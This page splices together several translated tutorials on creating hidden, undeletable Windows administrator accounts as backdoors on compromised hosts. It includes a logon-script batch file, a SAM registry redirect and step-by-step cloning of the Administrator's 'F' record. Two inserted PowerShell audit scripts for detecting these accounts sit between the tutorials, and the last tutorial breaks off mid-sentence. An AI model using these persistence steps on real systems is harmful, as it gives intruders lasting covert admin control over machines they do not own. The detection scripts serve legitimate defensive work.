Establishment and detection of super-hidden server accounts

Source: Internet
Author: User

1. Create an administrator user that can never be deleted

Procedure:
1. Create a .txt file on your computer.
2. Enter the following content in it:

@echo off
net user xixi 123456 /add
net localgroup administrators xixi /add

Note: in the first line, xixi is the user name and 123456 is the password.

3. Save the file and change the extension to .bat, for example xixi.bat. Note: the name is arbitrary, but the extension must be .bat.
4. Copy the file into the directory C:\WINNT\system32\GroupPolicy\User\Scripts\Logon on the other computer. If the directory does not exist, create it yourself.
Done. From now on the other computer has this administrator account: delete it, start the machine again, and it is back.
If you change the content to

@echo off
net user administrator 123456

then no matter how the administrator password is changed, it will be 123456 again the next time the machine starts.
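The persistence above depends on a script sitting in the local Group Policy script directories and running `net user ... /add` or `net user administrator <password>` at every logon. The following PowerShell function is an added example (not from the original article) that audits those directories for scripts containing such commands. The directory list is the standard local GPO layout under %SystemRoot%\System32\GroupPolicy; the regular expressions are assumptions built from the commands shown above.

```powershell
# Added example (not from the original article): find logon/startup scripts in the
# local Group Policy script directories that create accounts, reset passwords or
# add members to the Administrators group.
function Find-AccountCreatingScripts {
    param(
        [string]$SystemRoot = $env:SystemRoot
    )

    # Standard local GPO script locations (user logon/logoff, machine startup/shutdown).
    $scriptDirs = @(
        (Join-Path $SystemRoot 'System32\GroupPolicy\User\Scripts\Logon'),
        (Join-Path $SystemRoot 'System32\GroupPolicy\User\Scripts\Logoff'),
        (Join-Path $SystemRoot 'System32\GroupPolicy\Machine\Scripts\Startup'),
        (Join-Path $SystemRoot 'System32\GroupPolicy\Machine\Scripts\Shutdown')
    )

    # Patterns (assumed) matching the commands the backdoor relies on.
    $patterns = @(
        'net\s+user\s+\S+\s+\S+\s*/add',            # net user <name> <pw> /add
        'net\s+user\s+administrator\s+\S+',          # net user administrator <pw>
        'net\s+localgroup\s+administrators\s+\S+\s*/add'
    )

    $findings = @()
    foreach ($dir in $scriptDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -Recurse -File -Include *.bat, *.cmd, *.ps1, *.vbs |
            ForEach-Object {
                $file = $_
                # Select-String is case-insensitive by default, so "Net User" is matched too.
                foreach ($hit in (Select-String -LiteralPath $file.FullName -Pattern $patterns)) {
                    $findings += [pscustomobject]@{
                        Script  = $file.FullName
                        Line    = $hit.LineNumber
                        Content = $hit.Line.Trim()
                    }
                }
            }
    }
    return $findings
}

# Usage: prints one row per suspicious line; an empty result means nothing was found.
Find-AccountCreatingScripts | Format-Table -AutoSize
```

The scripts.ini file in the same directories lists which scripts are actually registered with the local policy, so it is worth reading alongside the findings. Because the backdoor re-runs at every logon, it also leaves a recurring trail in the Security log: event 4720 (user account created), 4724 (password reset attempt) and 4732 (member added to a security-enabled local group) appearing at each boot for the same account is a strong indicator.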


2. I think the above method is not ideal. It would be better to create the account with the hidden-account method.
Procedure:
1. First, create an account whose name ends with a "$" sign, for example saturn$, and set a password for it.
2. Save the following as a registry (.reg) file.
The code is as follows:
-------------------------------------------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\saturn$]
@=hex(1f4):
-------------------------------------------------------------------------------
Note: 1f4 is the hexadecimal RID (relative identifier) of the built-in Administrator account, 500 in decimal.
3. Save and import the file, then set the password from a CMD prompt:
net user saturn$ 123456

An invisible account is created: it does not appear under "Local Users and Groups", so nobody will delete it. Remember not to try this on your colleagues' computers. If it gets found out ..... Hey :-)

This article is from bkjia.com technical blog

Hide the Administrator account in three minutes.

Regedt32.exe can be used to set permissions on registry keys. On NT/2000/XP, account information is stored under the HKEY_LOCAL_MACHINE\SAM key of the registry; apart from the SYSTEM account, no user has permission to read its contents. For this reason we first grant ourselves "Full Control" on the SAM key using regedt32.exe, after which the information under SAM can be read and written. The steps are as follows:

1. Assume that we have logged on to a zombie host through Terminal Services as the super user administrator. First, create an account from the command line or in the account manager; here I create hacker$ on the command line: net user hacker$ 1234 /add

2. Choose "Start" > "Run", enter regedt32.exe and run it.

3. Click "Permissions". In the window that pops up, click "Add" to add my logon account to the security list. Here I am logged on as administrator, so I add administrator and set its permission to "Full Control". Note: it is best to add the account you are logged on with, or the group it belongs to; do not modify the original accounts or groups, or a series of unnecessary problems may occur. Remove the account you added here once you are finished.

4. Choose "Start" > "Run" and enter regedit.exe to return to the regular Registry Editor. Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$.

5. Export the items hacker$, 00000409 and 000001F4 as hacker.reg, 409.reg and 1f4.reg respectively. Open the exported files in Notepad, copy the value of the key "F" under the super user's item 000001F4 over the value of the key "F" under item 00000409 (the item that corresponds to hacker$), and then merge 409.reg and hacker.reg.

6. On the command line, delete the user hacker$: net user hacker$ /del

7. In the regedit.exe window, press F5 to refresh, then choose File > Import Registry File and import the modified hacker.reg into the registry.

8. The hidden super user hacker$ is now created. Close regedit.exe, and in the regedt32.exe window restore the permissions on the HKEY_LOCAL_MACHINE\SAM key to their original state (it is enough to delete the administrator account you added).

9. Note: After the hidden super user is created, hacker$ is not visible in the account manager, nor in the output of the "net user" command on the command line. However, once the super user has been created, its password can no longer be changed: if you use the net user command to change the password of hacker$, the hidden super user becomes visible in the account manager and cannot be deleted.


Create and delete hidden administrator accounts
When hackers intrude into a host, they try to protect their "fruits of labor", so they leave various backdoors on the compromised machine (the "zombie") in order to control it for a long time. The most commonly used backdoor is account hiding: a hidden account is created on the zombie and used whenever needed. Account hiding is the most concealed kind of backdoor; users generally find it hard to discover that a hidden account exists in the system. This article discloses the common techniques hackers use to hide accounts.

Before hiding a system account, we first need to know how to view the accounts that already exist in the system. There are three places to look: the "Command Prompt", "Computer Management" in the Control Panel, and the registry. Administrators usually only check for anomalies in the "Command Prompt" and "Computer Management", so hiding system accounts from these two places is the focus of this article.

I. Sleight of hand in the "Command Prompt"
Creating a hidden account in the system is actually not very advanced; a simple hidden account can be created with the "Command Prompt" we use every day.
Click Start > Run, enter CMD to open the Command Prompt, type net user piao$ 123456 /add and press Enter; "The command completed successfully" is displayed. Then enter net localgroup administrators piao$ /add and press Enter. We have now used the Command Prompt to create a simple "hidden account" named "piao$" with the password "123456" and raised it to administrator privileges.
Let's check whether the hidden account was created successfully. In the Command Prompt, enter the net user command to list the system accounts; press Enter and the accounts that exist in the current system are displayed. From the returned results we can see that the "piao$" account we just created does not appear. Next, open "Administrative Tools" in the Control Panel, open "Computer Management", expand "Local Users and Groups" and look in "Users": there the hidden account "piao$" we created is plainly exposed.
It can be concluded that this method only hides the account from the "Command Prompt"; it is powerless against "Computer Management". This way of hiding accounts is therefore not very practical and fools only careless administrators. It is an entry-level account hiding technique.

II. Hiding accounts in the registry
From the above we can see that hiding an account only from the Command Prompt has an obvious weakness and easily exposes itself. Is there a technique that hides the account from both the "Command Prompt" and "Computer Management" at the same time? The answer is yes, and all it requires is a small change in the registry, after which the account vanishes from both.

1. Back on top: giving the Administrator permission to operate on the registry
In the registry, the key values of the system accounts under "HKEY_LOCAL_MACHINE\SAM\SAM" need to be modified. However, on arriving there we find that the system account key cannot be expanded. This is because by default the system grants the administrator only the "Write DAC" and "Read Control" permissions on it, not the permission to modify, so the key values under "SAM" can be neither viewed nor modified. However, another registry editor in the system can be used to grant the Administrator modification rights.
Click Start > Run, enter regedt32.exe and press Enter. Another "Registry Editor" appears; unlike the "Registry Editor" we usually use (regedit.exe), it can change the permission restrictions that apply when a system account operates on the registry. In regedt32.exe, go to "HKEY_LOCAL_MACHINE\SAM\SAM" and click "Security" > "Permissions". In the "Permissions for SAM" window that appears, select the "Administrators" account, tick "Full Control" in the permissions section below, and click "OK". Switching back to the Registry Editor, we can now see that the key values under "HKEY_LOCAL_MACHINE\SAM\SAM" can be expanded.
Tip: the method described above applies only to Windows NT/2000. In Windows XP, permissions can be set directly in the Registry Editor: right-click the key whose permissions you want to set and choose "Permissions".

2. Swapping the beams: replacing the hidden account with the administrator
After obtaining the registry permission, we can start creating the hidden account. In the Registry Editor go to "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names". All accounts that currently exist in the system are listed here, including our hidden account. Click our hidden account "piao$": the "Type" of the key value displayed on the right is 0x3e9. Go one level up to "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" and you will find the item "000003E9"; the two correspond to each other, and all the information of the account "piao$" is stored under "000003E9". In the same way we find that the item corresponding to the "administrator" account is "000001F4".
Export the key "piao$" to piao$.reg, and export the "F" values of "000003E9" and "000001F4" to user.reg and admin.reg respectively. Open admin.reg in "Notepad", copy the data following the "F" value, paste it over the "F" value in user.reg, and save. Next, open the "Command Prompt" and enter net user piao$ /del to delete the hidden account we created. Finally, import piao$.reg and user.reg into the registry. At this point the hidden account is complete.
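All three articles on this page rely on the same two SAM manipulations: pointing a "$"-suffixed Names entry at the Administrator's RID 0x1F4, or copying the Administrator's "F" record into another account's RID key. Both leave measurable inconsistencies in the hive. The following PowerShell function is an added example (not from any of the original articles) that audits the SAM for them from the defender's side. It assumes it is run as SYSTEM (for example from a scheduled task or a `psexec -s` shell), since Administrators cannot read HKLM\SAM\SAM by default, and that the Get-LocalUser cmdlet is available (Windows 10 / Server 2016 and later). The RID offset 0x30 inside the "F" record is the layout used by common SAM parsers; the check names and output format are my own.

```powershell
# Added example (not from the original articles): audit the SAM hive for hidden or
# cloned accounts. Run as SYSTEM; Administrators have no read access to HKLM\SAM\SAM.
function Get-SamAccountAudit {
    $usersKey = 'HKLM:\SAM\SAM\Domains\Account\Users'
    $namesKey = Join-Path $usersKey 'Names'

    # RID keys are hex-named (000001F4 = 500 = Administrator); 'Names' is the name index.
    $ridKeys  = @(Get-ChildItem -LiteralPath $usersKey | Where-Object { $_.PSChildName -ne 'Names' })
    $nameKeys = @(Get-ChildItem -LiteralPath $namesKey)
    $findings = @()

    # Check 1: the RID stored inside each F record (little-endian DWORD at offset 0x30,
    # as read by common SAM parsers) must match the key it lives under. Copying the
    # Administrator's F into 000003E9 leaves an F that claims RID 0x1F4 under key 0x3E9.
    $ridsSeen = @{}
    foreach ($k in $ridKeys) {
        $keyRid = [Convert]::ToUInt32($k.PSChildName, 16)
        $f = (Get-ItemProperty -LiteralPath $k.PSPath -Name F -ErrorAction SilentlyContinue).F
        if (-not $f -or $f.Length -lt 0x34) { continue }
        $fRid = [BitConverter]::ToUInt32($f, 0x30)
        if ($fRid -ne $keyRid) {
            $findings += [pscustomobject]@{
                Check  = 'F-record RID mismatch (cloned account)'
                Key    = $k.PSChildName
                Detail = ('F record claims RID 0x{0:X} ({0})' -f $fRid)
            }
        }
        if ($ridsSeen.ContainsKey($fRid)) {
            $findings += [pscustomobject]@{
                Check  = 'Duplicate RID across F records'
                Key    = $k.PSChildName
                Detail = ('RID 0x{0:X} also claimed by {1}' -f $fRid, $ridsSeen[$fRid])
            }
        } else {
            $ridsSeen[$fRid] = $k.PSChildName
        }
    }

    # Check 2: Names entries and RID keys should pair one-to-one. A Names entry whose
    # value type is 0x1F4 (the saturn$ trick) adds a name without adding a RID key.
    if ($nameKeys.Count -ne $ridKeys.Count) {
        $findings += [pscustomobject]@{
            Check  = 'Names/RID key count mismatch'
            Key    = 'Names'
            Detail = ('{0} names vs {1} RID keys' -f $nameKeys.Count, $ridKeys.Count)
        }
    }

    # Check 3: names present in the SAM but not returned by the account API, plus any
    # "$"-suffixed names, which `net user` never lists (-notcontains is case-insensitive).
    $visible = @(Get-LocalUser | Select-Object -ExpandProperty Name)
    foreach ($n in $nameKeys) {
        $name = $n.PSChildName
        if ($visible -notcontains $name) {
            $findings += [pscustomobject]@{
                Check  = 'SAM name not returned by Get-LocalUser'
                Key    = $name
                Detail = 'Hidden or orphaned account; inspect its RID key'
            }
        } elseif ($name.EndsWith('$')) {
            $findings += [pscustomobject]@{
                Check  = '$-suffixed account (hidden from net user)'
                Key    = $name
                Detail = 'Confirm this account is legitimate'
            }
        }
    }
    return $findings
}

# Usage: one row per anomaly; a clean system returns nothing.
Get-SamAccountAudit | Format-Table -AutoSize
```

Check 1 is the decisive one for the "F" copy technique in this section and in the second article: no legitimate account ever carries another account's RID inside its F record. Check 2 catches the Names-only redirection from the first article's section 2, and Check 3 covers the entry-level "$" trick from section I above, which only hides from `net user`. Because the cloned account logs on as RID 500, Security log events for the built-in Administrator (logon type 10 for Terminal Services, event 4624) that occur when nobody should be using that account are the corresponding signal in the event log.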

3. Burning the bridge: cutting off the ways to delete the hidden account
Although our hidden account is now hidden from both the "Command Prompt" and "Computer Management", an experienced system administrator may still delete it using the Registry Editor. So how can we make our hidden account rock solid?
Open regedt32.exe and go to "HKEY_LOCAL_MACHINE\SAM\SAM" to set
